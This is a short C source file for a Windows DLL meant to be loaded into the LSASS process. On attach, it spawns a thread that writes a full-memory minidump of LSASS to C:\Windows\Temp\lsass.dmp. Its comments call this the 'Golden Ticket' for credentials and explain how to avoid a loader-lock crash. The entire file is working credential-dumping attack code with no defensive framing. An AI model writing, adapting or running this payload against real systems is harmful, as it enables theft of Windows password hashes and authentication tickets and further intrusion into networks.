#include <windows.h>
#include <DbgHelp.h>
#include <stdio.h>

DWORD WINAPI DumpThread(LPVOID lpParam) {
    // We create the file in a public place
    HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\lsass.dmp", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    
    if (hFile != INVALID_HANDLE_VALUE) {
        // MiniDumpWithFullMemory is the "Golden Ticket" for credentials
        BOOL success = MiniDumpWriteDump(
            GetCurrentProcess(),   // It's dumping itself (LSASS)
            GetCurrentProcessId(), 
            hFile, 
            MiniDumpWithFullMemory, 
            NULL, NULL, NULL
        );
        
        if (success) OutputDebugStringA("[+] LSASS Dump Successful!");
        CloseHandle(hFile);
    }
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        // Run in a thread to avoid crashing LSASS (Loader Lock)
        CreateThread(NULL, 0, DumpThread, NULL, 0, NULL);
    }
    return TRUE;
}
